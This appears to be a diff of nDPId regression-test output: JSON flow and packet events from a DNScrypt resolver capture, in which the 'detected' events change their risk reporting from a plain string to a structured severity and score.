 01228{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":946739611961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739611961,"pkt":"REREREREZmZmZmZmCABFAAJcJkxAAKYRdegKAAABl1DeT7m5AbsCSDi2hxVktS2XlAXK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDO6Ugg3iONmSyzFBmv3WeUbwZp9IYiTM191d4EGpSNgn1Vnmhi0dnshrsldty0p0rog9vCUpw6jzc4+P9Puw1SQZaVq6AQHs9j8FHA6TV2fEODI+IleWgpNwN7RkTyReTtbcAyqcw4LZqRdzr4SFPlNOAV9QpavHsXRRYeP7A8ijLspxo8F1YH1toI16qO3Wyz3w2HsVy3nP0JwlulITaJBD9qG3whIbZyqhQYyJ2BvR67IS++x+jXq0MGJud5+s9l28XPdTs\/vK3y+tQd2+A5CezpWRNwOoTnzQrdnO5idkwCcFNbHZKDQFROmtVXAPisaIFuh2zDBTP9EootPFJMHtt5MCwQKxsqxAokmytyeHxjFqA8WwfVcAi5mF\/ZuGsfcjSKloXW082oaEMVSIkwJ74\/Jb+rJZiHxMq58YuihNtogJ1XyZ7N5w9vgrIru3Mf+Yb1s51E\/BAtAVet5JOSYKjHsRrwqjR5SM92Qhm81hCxh\/GAZd8BGwMYGW43YzzX7cWwZTJxpff01gK7OvmzthL7xQA0ARPjY6jfbbFZeg4DdbEVEZyuWoK3KXb6sDjKwxJLrncbQshDJtGHzwOzijM3V5WnhnWXGriaawdzvTvZzhIQ0srq9F4tmvJ8cwU537l2ggbdtCOlpHKYsSA7i9H4MB3lIBKJSrAhjGcr6R+mT\/OaHMOBRDayFlbn\/EG+N1\/YwEFto6"}
 00950{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":946739612032,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"ts_msec":946739612032,"pkt":"ZmZmZmZmRERERERECABFAAGMXAxAADQRsviXUN5PCgAAAQG7ubkBeOzQcjZmbnZXajjulIIN4jjZkssxQZqSDAUmKpfd49BFPcXUJNsH1tfF8ILOrmEInURZhClsi8Vfa6egoR1ZaEP2TFIvnnwmg3DMIMPj1X93gFJnlICV6s1bYKcQ0IVszmSovV29MoXsJXRtqoBvjWoL6erf64n\/9lY7Pizn5GAIJ+ZpdKmiKxdjxBHa0Bf9zJfNMagz21JNImGKGgrF3C+muN5QaVzi53jM6qhgKER\/YzujMJfiHF\/aaLCV7ensBtZtMGPEX2NyQDksoYgHkNVty+uHcb5FWtodWfWQwK\/pSx8\/6EDGrCYsD3hCk628LO83kEMpLh3mWe\/DOYJ4VpTxZ8unmS83bK0xOwnj+LV6NHmYBoNZVrz1zkXkqx7GlUurn5Yj1XRRPDFjXpVJqBkZG7vuwQAAc0Zs2zwVPvHOdh3jfX9L6TmayQGceJ8L7zIXqi14xI3xt4P62MSxtYdyqx5X5yN0e0crNQn80yUKKZ8="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739614386,"flow_last_seen":946739614386,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739614386,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01229{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":946739614386,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739614386,"pkt":"REREREREZmZmZmZmCABFAAJc989AAKYRHsYKAAABkFtq45cEAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCN0sI1afsDgB7g4z3waLSDC2o9apEHGrmX1\/\/XVDTnA82XGV5BkJ6hyx9SwD+WiC6uDTp6AbKbCDGnUn3j+tLJpn2hItHoTa\/xeDArjby7slJF40ySc4tPuE+UMiXypOsTanLuynVvS9n8gbILRPI43brHHY7HDFenFZDOtfB+JxdnOOFNDYhfJprBR2DTCXiO3N4Bex+NG0pKxAEiN254J3qeD3\/OAwnKA81+nREhgnE+6I0CyIA201vB4x+d\/+mhwpFUuUhbbD\/SfJPnQXjy3jOXtIJLaIFLNycvxG+PS5Ojxq9uCtE2XhA4tfk90STkQEJNACVZbLwRyAcYZfg9qxeV8twgsNlEDF5PIG3nzQvpvywuTYlFQryvjTvIH4VR9wK25AyfzR7C\/t+iRavrUqnzmU\/fAOG0CvTaSqHI+4MnbhUZVoxS2UyUFdELJqReTeLin8fcrvX1wJgCVSp8+cPs7vBKaV+JiLAgU+OxuxldboVrer9459FyQl4WFjHazGEL4xKqJvMIvrueodNiqXGE6cS6tIYUKgaQ4AFmKHlACJF\/olwP9NoAOKSUY3Y66DFQ4v+LM9mU+SWhao2muTb4Tju4w6ERuBOUyzP9LBhYeQUMfKmBYpIb+UNg41n6P7vyU8kDamY+f+xv4B8HSDYKX2DWu9KXaFSPBiu3SXVmscc3+ivcw18HJ9BS2CgGcv+eo7Dnd"}
 00773{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":946739614411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":946739614411,"pkt":"ZmZmZmZmRERERERECABFAAEMVHFAADcRMnWQW2rjCgAAAQG7lwQA+NqDcjZmbnZXajgjdLCNWn7A4Ae4OM+V95TEH+wEPWjCUqAPqLgKz03zsgxbeQD\/5ecQsA4RfRBRViLb9egczysjt1OolDW9kDXjXmmQiF571kS9rCn31TE60wfdQuvLsxXdWOqgaclRBMIB2+xIEcqZiOOnbAC3owgMpf07BM+8qosYU+1EzXz7EouWJa8VxL5FW0SNfmJsYYBjcSkC0myJwAMFESyFpxNCQtb+Z3Q2X9FOvOphUjS1Bh6POqoHGB4CgchAKjQ4X8fxQb5Wv65jhpmBRnmn5yUbcKZT8A2zfL7KGiy9Vrk+mU3WwB6UiVmU"}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739615603,"flow_last_seen":946739615603,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739615603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":946739615603,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739615603,"pkt":"REREREREZmZmZmZmCABFAAJc+DdAAKYRHl4KAAABkFtq4+vpAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCAf8ZxPLtyAmkbotfhN9FBFDCeDP4ncrd\/TOhQoXS6aaK7Qk9xNjCJAE83nYrNPvD\/886RDhSKbcIu9OfJQKTcWCPazM2lBZj5zsNZveK3aqI2jCfxNNTpF+6txS57\/tj1ipnKY33r09Y4upstDW1n4WR1Nsfz7UrdB6\/6T5NqtK9QGMv\/EvcCVnsI4etNtWFQzRfRc7E0Skos7MBtpGgiC86vsChOu7VYwrpe6b0CyOg6OcUDxGDoVs5ICEPVHDsd2RqeGP3QVPcQgf4RCQy1ImYumox7n6l80U\/14hvlajMMIkDpEpiu4KAyZSDWRXbhAD60XmVYOZ0blLEelAzhupD39arDQughZsQic9xuigYdXIQBw\/Fbye0tmt8ihEnYnMhGIlRckiYzkA2ioG3ckpl1JlkazwpX87IXdgB1wqkVRuynhNnc1hxUbpiv0BrBR\/fV0UhwJN\/T1pdWRfFcsSRYMRLW\/ixpyROEV8e41kHMNotPvlHLtOyi\/2lXQAveUUQT3pByUNSr1McJDQGc7QNA5zFLNTZBJqb0kxE\/mLWe0EMXj7XbfUBu7q2gn8G7CETqFs71z\/s7TC\/nsaD\/ETkxWcTnA0aNzC2E\/O5fjyCETbuv3jbGkWzJPfOkBc4w2M9f3qNHjwEkn1LJYLOKWSLyq34DWAVom05p8N+1XzUjvKKpr2SZf2pwRkSXCrFPZsLRFNDkb"}
 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":946739615628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":946739615628,"pkt":"ZmZmZmZmRERERERECABFAAFMVRFAADcRMZWQW2rjCgAAAQG76+kBOCk6cjZmbnZXajggH\/GcTy7cgJpG6LWEOqYXy9eZW2i3Qbkc+\/ab87nm8hxILOmwmIagjS3082zNqzOBnUfDvXH1wdeKy55EXymmAOR3ISimesD3NSPRd1l+RxmfBHNn3a7Bw5aEHaIlwaCNLNQFqK+BhPyPkErS5VbNOhmY5xHp0Ui2kKe72GXKf4WLQR7zh9TTBssKJNiCiW7f2BiWF1TEyHipKDeny4ICpyTd3Wo2+B3IqtOVZ3rHmsTn5k+U7Dl0LO15r3tqh6n0WPCSwFlzqIYmOuOCTIqRIw6ZGfDu889dv4sOKdhqSdpo5gBsF5uRtahg1DOgrYIIV6k+VvSO\/ChUBVAry4GOrZXgTyxKsOYZ+21X5TNc3orLlCmaabkA\/armCA8Dr977H97D0+Y1rw=="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739617004,"flow_last_seen":946739617004,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739617004,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01231{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":946739617004,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739617004,"pkt":"REREREREZmZmZmZmCABFAAJc+TpAAKYRHVsKAAABkFtq48ULAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDMYv6lXLSTAmrdvTCyOYpoj3kt1OReSCqSRptuX3NltyQeLyb5cvSCa8IppjLkWscLpkUyp0EuX0uRM80Z0tP4bkozd9zL82wWjC8W8tmOO4RTgddRqe2OW6UcaHGdoyLPby7WVQbLUZtFO6cYUzbEsqfBQPgCTh\/qKzkBHUUFOcOzpUyI3MqJzYO0+HYvDMlUyYOn02yFtLLa5Pq1FzqbW8q5lSsV54O2im5U817KNJVnj\/1Ex0RZMgloFaQtGlXZoAu0SSgUwvvAL1FO1uoRRAx+AcSeEgZ9dYJhUksMKZOl0pd1gb1y8kNBpupQux9D3tnmm7KlCbGQCOdJ7gfT1HbeHBBq0E1\/iBd8zqzehjb3a24okMSsxmhLmPfcn4P9uZtYdGDWmUahJxq\/ugthfP8l7FCJb27pTFxpBGhYYKBpCs8n66CHCXntWVKyqe9MG6tK4sOASpV12JTr1YNDUpJbbagNSSVC5+IbRWJ9kB5Tr1rdpADAHtTZhkSuXY7lHM\/VYuUqKr1+qXLnLCAo5cFYbfySTD\/RlMa1jGWX7ZjRRid5DRXgauaKlqQZ3kXMkfTFpvDON8m0NTWj9A1FG\/47eQpOKy5YSZ3VSyyGdtTjV5AwxRf0u5j7LIlgeShVaNcOEV16mq+tTopZDdjg\/q8bR3f8vgTH0VjGrhrUoHlYjd9nR+n\/OCx\/s7syonVC6jt\/ML6xGu"}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":946739617027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":946739617027,"pkt":"ZmZmZmZmRERERERECABFAAEMVhtAADcRMMuQW2rjCgAAAQG7xQsA+AQwcjZmbnZXajjGL+pVy0kwJq3b0ws3QQmU1oaTmLs\/KBJiu7G8scEX3PGgxPg+ruVnqVNFUraQxsErWYtLItB90wPdHcXiqlBhJWtFp4LLnWAvhKLKhjFEw\/atFhZeDiqXStF1L94cSN904FNHbkEph9CBTREE+edOKfiP4WqHgqjHUNPQp7n\/XDg\/V39BVU7YZKgJKtX72jHsW8p+y1tD4\/oB5Dnpf9M\/FhDm1mUKnuHl2H9\/fkExtOnA6OjnoUWzl+W3CX4dYlGVJl9MVrQvZzZFoWkXil+wG5XW3z1KVD3tlSpd4VUIxP+btk8gcC+s"}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739620053,"flow_last_seen":946739620053,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739620053,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01229{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":946739620053,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739620053,"pkt":"REREREREZmZmZmZmCABFAAJc+yVAAKYRG3AKAAABkFtq45NPAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDJIKeRwV+B3o\/S1Vi20pwQIdLtPPzfiWHWJQqFzxTOLyCv2P6iXlQZj5XjV3kgHWrJU4+x22jVmI8HXUQsL4Ett9CycuHxHxWcs\/QYSIRhXy4zBDqi\/TRLgCDvexnLEbWrLVqZlx1oiHSo5WUfrBG87Hnp2cAe\/gsf5JPymP1MD3qdNPqZTHuk8S3o2b7BAHlFbKntVCDBSVQ2u7L9Ln\/6QrREPkeEFI1x9w5DZ5HrdTDgz+nlHzDSJBD364iAl3eoetv8rISqtBsiSLQHroHpiaUZtlR34l9Vzjmefx2nlmLBPG9TXLLZ\/mrHRFJkh\/uUcYYlECvdkuHlyfOYBwWiwoiqEQ+llPw\/pJiTU8CEAtaLv6CbONOtgp6JdiKE6d43D6uaZcFnqBbwg9eaCGVpcGiuUf8O0AgPu2sDwbVkeFGCSP+1RYWtMKN4UHnlXAzPp5xMNSLWhVnOiQOltHL0A4mIocw8NAKgYgB5WImGwHYZJTu3vKHL1ma4UUJgC2aPqavoEA8xSewTk8+kcdCu+H7U80l6uImg5OwmEHjnULbQ0NG6WqqnmnPPxiAFv0OcQF6VQejNwyFXYLHhqFbcBYdLiQUtlr\/CQbqH4bkFMHbjKfSQ5+8dmJhmOjdlgfwyZVo9qRa+DzThEZzNmUms2ITRpkxyxskJfLxizZZ7rIR6efqljBrZaiXsrJyXuIjgdlqkXHyYFN"}
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":946739620112,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":946739620112,"pkt":"ZmZmZmZmRERERERECABFAADMWFtAADcRLsuQW2rjCgAAAQG7k08AuMXMcjZmbnZXajiSCnkcFfgd6P0tVYuPcDHPBNH+Q2V36ecIOy5+Vn6hASP7zwS+HB7\/COLeZpsYSR\/D4KtiLxFMLHMCSd4CEFa3HkazvGkn1cTMf7cEedRa5ffS2XboBOubQlEIegWZ\/uOw8cxjcAsifupeBdcSOB0uu0iqAXb97mPtwXo9C5m\/fEJEqoOJOH7mervMe4nPhBoqZk\/lTKOfh1zHYDnQCY0xNdH9fhG+JJ4="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739660371,"flow_last_seen":946739660371,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739660371,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01233{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":946739660371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739660371,"pkt":"REREREREZmZmZmZmCABFAAJc6wNAAK8R\/JUKAAABwx5eHJ\/+IPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAyVmLtuOyOPrdbG9Aa84c6ABESOcWKO1lD0bmXASu6Lp1JrrhdSsrfi+qCLd+yV08wcBIOyOD3xWu+JqcvR+qyyD2wAqK+7GtNLfa5CYKvl4+qE+B8Fdcg3etmdvWho9v6RWRGqvWQ79X3lh7drodQ5tDBKL+haa6jK+KUocn+9wX11hwHxQkGR1McxgwheyWwiQ8yk86\/0X3FOuLzu\/q11WpJtGw+xpq\/OB+8OUVOD89R6Mnj\/UOcx7obvr0eYbF5A8onkaQEbT7AaiYRJQ+hA7ZZDi2ljxg+uDg1AUnD5AkpxvEvbz9buRkBehRmtAjmpjCb+1eSSGGy0pj3fWliJpufCy0cLqKeBAa8pN+PboX7ibcQKD2oLVDzOMCPNysRr7U4iSHLRzA3mGLlWv1wmtPqVLl\/EoRbf02Q+FQ\/4r6mOaMPxUziXWn4x9EAZfWAyRDD7Afeh1n3Kmrb8xH0TDb8AwH7WhW4050ZoDY8fwOoRj\/\/yicxCkUFPRn2\/1wmsWfaim9o7xstoH1TFkuOYolb5zL0b\/s+Q6LzmCI0CRhGzcGbTPbKaxkq5YwwG9Y4Y7yX3r23bemnved9GKHI+BB80yEb94yRK1wmhzXgZyDB626hQAGMFgeYF1jYBg8XUeiAWAkUeVdpaFQcCYu3RciaRBtQKGADb1WYqE\/SeWtKsrZLM+n2BJmC8O6wwHCEtXzUPi0rg"}
